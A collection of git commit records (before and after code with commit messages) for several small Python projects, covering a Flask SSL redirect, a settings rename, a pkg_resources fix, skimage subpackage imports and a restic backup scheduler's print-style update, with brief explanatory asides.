from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
Add SSLify to force SSLimport logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
<commit_before>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
<commit_msg>Add SSLify to force SSL<commit_after>import logging
from flask import Flask
from flask_cache import Cache
from flask_login import LoginManager
from flask_sslify import SSLify
# Set up logging
log = logging.getLogger('slot')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log.addHandler(ch)
app = Flask(__name__)
app.config.from_object('config')
sslify = SSLify(app, age=300)
cache = Cache(app, config={'CACHE_TYPE': 'redis'})
with app.app_context():
cache.clear()
from slot.users.views import users_blueprint
from routes import dashboard, render_new_procedure_form, receive_sms, complete_procedure
import slot.users.controller as user_controller
import db_fieldbook as db
app.register_blueprint(users_blueprint)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = "users.login"
@login_manager.user_loader
def load_user(user_id):
print("Loading user {0}".format(user_id))
result = user_controller.return_user_instance_or_anonymous(db.get_user(user_id))
return result
|
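Flask-SSLify works by intercepting plain-HTTP requests and redirecting them to the HTTPS URL, attaching a Strict-Transport-Security header whose max-age is the `age` argument (300 seconds in the record above, so the HSTS pin stays short while testing). A minimal sketch of the wiring, assuming the flask and flask_sslify packages are installed:

from flask import Flask
from flask_sslify import SSLify

app = Flask(__name__)
sslify = SSLify(app, age=300)  # redirect http:// to https://; HSTS max-age of 300s

@app.route('/')
def index():
    return 'served over HTTPS'

if __name__ == '__main__':
    app.run()  # behind a real TLS terminator in production
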
6f8ef313bcf90b7e96d05186eb606ff53d0cea90
|
buchner/settings.py
|
buchner/settings.py
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
Remove last trace of BLUEPRINTS
|
Remove last trace of BLUEPRINTS
|
Python
|
bsd-3-clause
|
rehandalal/buchner
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
Remove last trace of BLUEPRINTS
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
<commit_before>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
<commit_msg>Remove last trace of BLUEPRINTS<commit_after>
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
Remove last trace of BLUEPRINTSimport os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
<commit_before>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
BLUEPRINTS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
<commit_msg>Remove last trace of BLUEPRINTS<commit_after>import os
from buchner.helpers import truthiness
def abspath(path):
return os.path.abspath(os.path.relpath(path, os.path.dirname(__file__)))
DEBUG = truthiness(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///buchner_app.db')
INSTALLED_APPS = []
# Flask-Funnel
JAVA_BIN = os.environ.get('JAVA_BIN', 'java')
YUI_COMPRESSOR_BIN = os.environ.get('YUI_COMPRESSOR_BIN',
abspath('../bin/yuicompressor-2.4.7.jar'))
LESS_BIN = os.environ.get('LESS_BIN', 'lessc')
try:
from bundles import *
except ImportError:
pass
try:
from settings_local import *
except ImportError:
pass
|
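The settings module above follows the environment-override pattern: every value reads from `os.environ` with a default, so a deployment can reconfigure the app without editing source, and the trailing star-imports let optional local files win last. A standalone sketch of the core pattern (the `truthy` helper below is a stand-in for the project's `truthiness`, since environment variables always arrive as strings):

import os

def truthy(value):
    # Stand-in for buchner.helpers.truthiness.
    return str(value).lower() in ('1', 'true', 'yes', 'on')

DEBUG = truthy(os.environ.get('DEBUG', False))
DATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:///app.db')

print(DEBUG, DATABASE_URL)  # False sqlite:///app.db (when neither var is set)
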
fc608d8ab5d463c72d5e2e267c14e0c304e39acd
|
Cauldron/bundled/GUI/__init__.py
|
Cauldron/bundled/GUI/__init__.py
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
Fix bug in bundled GUI
|
Fix bug in bundled GUI
|
Python
|
bsd-3-clause
|
alexrudy/Cauldron
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)Fix bug in bundled GUI
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
<commit_before>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)<commit_msg>Fix bug in bundled GUI<commit_after>
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)Fix bug in bundled GUIimport version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
<commit_before>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filepath("Cauldron", "data/reldir/data/icons")
Images.initialize (path)<commit_msg>Fix bug in bundled GUI<commit_after>import version
version.append ('$Revision: 83265 $')
del version
import os, pkg_resources
# Enumerate all the available attributes and functions within this
# module, for the benefit of those that insist upon doing
# 'from module import *'.
__all__ = ('Box', 'Button', 'Color', 'Event', 'Font', 'Icon',
'Image', 'Images', 'Log', 'Main', 'Monitor', 'Popup',
'Setups', 'Stage', 'tkSet', 'Value', 'version')
import Box
import Button
import Color
import Event
from Event import tkSet
import Font
import Icon
import Images
import kImage as Image
import Log
import Main
import Monitor
import Popup
import Setups
import Stage
import Value
from version import version
path = pkg_resources.resource_filename("Cauldron", "data/reldir/data/icons")
Images.initialize (path)
|
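The one-character diff above matters because `pkg_resources` exposes `resource_filename()`, not `resource_filepath()`; the original line would raise `AttributeError` as soon as the module was imported. A minimal sketch of the real call, assuming setuptools is installed and using pkg_resources' own package file for the lookup so the example does not depend on Cauldron:

import pkg_resources

# resource_filename() materializes a packaged data file on disk (extracting
# from a zip/egg if needed) and returns its filesystem path.
path = pkg_resources.resource_filename('pkg_resources', '__init__.py')
print(path)
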
d45fb029dc4bf0119062a07b962dbc7fff1f300a
|
skimage/measure/__init__.py
|
skimage/measure/__init__.py
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
Add imports of fit to subpackage
|
Add imports of fit to subpackage
|
Python
|
bsd-3-clause
|
ajaybhat/scikit-image,vighneshbirodkar/scikit-image,almarklein/scikit-image,GaZ3ll3/scikit-image,keflavich/scikit-image,ofgulban/scikit-image,paalge/scikit-image,keflavich/scikit-image,chintak/scikit-image,chintak/scikit-image,chintak/scikit-image,Britefury/scikit-image,youprofit/scikit-image,dpshelio/scikit-image,Hiyorimi/scikit-image,juliusbierk/scikit-image,michaelaye/scikit-image,oew1v07/scikit-image,newville/scikit-image,jwiggins/scikit-image,almarklein/scikit-image,newville/scikit-image,rjeli/scikit-image,paalge/scikit-image,SamHames/scikit-image,GaZ3ll3/scikit-image,WarrenWeckesser/scikits-image,chintak/scikit-image,chriscrosscutler/scikit-image,Hiyorimi/scikit-image,michaelpacer/scikit-image,rjeli/scikit-image,bennlich/scikit-image,ofgulban/scikit-image,bennlich/scikit-image,emon10005/scikit-image,chriscrosscutler/scikit-image,Midafi/scikit-image,Britefury/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,warmspringwinds/scikit-image,paalge/scikit-image,oew1v07/scikit-image,almarklein/scikit-image,juliusbierk/scikit-image,michaelaye/scikit-image,pratapvardhan/scikit-image,bsipocz/scikit-image,Midafi/scikit-image,warmspringwinds/scikit-image,WarrenWeckesser/scikits-image,emon10005/scikit-image,blink1073/scikit-image,dpshelio/scikit-image,ofgulban/scikit-image,jwiggins/scikit-image,robintw/scikit-image,SamHames/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,rjeli/scikit-image,bsipocz/scikit-image,ClinicalGraphics/scikit-image,vighneshbirodkar/scikit-image,youprofit/scikit-image,michaelpacer/scikit-image,SamHames/scikit-image,robintw/scikit-image,ClinicalGraphics/scikit-image,blink1073/scikit-image,pratapvardhan/scikit-image
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
Add imports of fit to subpackage
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
<commit_before>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
<commit_msg>Add imports of fit to subpackage<commit_after>
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
Add imports of fit to subpackagefrom .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
<commit_before>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon']
<commit_msg>Add imports of fit to subpackage<commit_after>from .find_contours import find_contours
from ._regionprops import regionprops, perimeter
from ._structural_similarity import structural_similarity
from ._polygon import approximate_polygon, subdivide_polygon
from .fit import LineModel, CircleModel, EllipseModel, ransac
__all__ = ['find_contours',
'regionprops',
'perimeter',
'structural_similarity',
'approximate_polygon',
'subdivide_polygon',
'LineModel',
'CircleModel',
'EllipseModel',
'ransac']
|
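The change above is the standard subpackage re-export pattern: implementation lives in private submodules, the package `__init__` pulls the public names up one level, and `__all__` keeps `from package import *` in sync with what was imported. A generic sketch of the layout (module and class names are illustrative, not scikit-image's, and the snippet is a package-file sketch rather than a standalone script):

# mypkg/__init__.py
from ._fitting import LineModel, ransac  # hypothetical private submodule

__all__ = ['LineModel',  # every re-exported name is listed once here,
           'ransac']     # so `import *` and the public API stay consistent
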
3a6d76201104b928c1b9053317c9e61804814ff5
|
pyresticd.py
|
pyresticd.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
Use py3-style print and string-formatting
|
Use py3-style print and string-formatting
|
Python
|
mit
|
Mebus/pyresticd,Mebus/pyresticd
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
Use py3-style print and string-formatting
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
<commit_before>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
<commit_msg>Use py3-style print and string-formatting<commit_after>
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
Use py3-style print and string-formatting#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
<commit_before>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print "\nStarting Backup at " + str(time.ctime())
os.system(restic_command)
print "\nRestic Scheduler\n----------------------------\n"
print "Timout ist: " + str(timeout)
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
<commit_msg>Use py3-style print and string-formatting<commit_after>#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import getpass
import time
from twisted.internet import task
from twisted.internet import reactor
# Configuration
timeout = 3600*24*3 # Period
restic_command = "/home/mebus/restic" # your restic command here
# Program
def do_restic_backup():
print('Starting Backup at {}'.format(time.ctime()))
os.system(restic_command)
print('Restic Scheduler')
print('-' * 30)
print('Timeout: {}'.format(timeout))
restic_password = getpass.getpass(prompt="Please enter the restic encryption password: ")
os.environ["RESTIC_PASSWORD"] = restic_password
l = task.LoopingCall(do_restic_backup)
l.start(timeout)
reactor.run()
|
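A side note on the conversion in the record above: `str.format` is the py3-idiomatic replacement the commit uses, and on Python 3.6+ the same messages can be written as f-strings. A minimal sketch of just the logging lines (assumption: Python 3.6+; this is not part of the original commit):

import time

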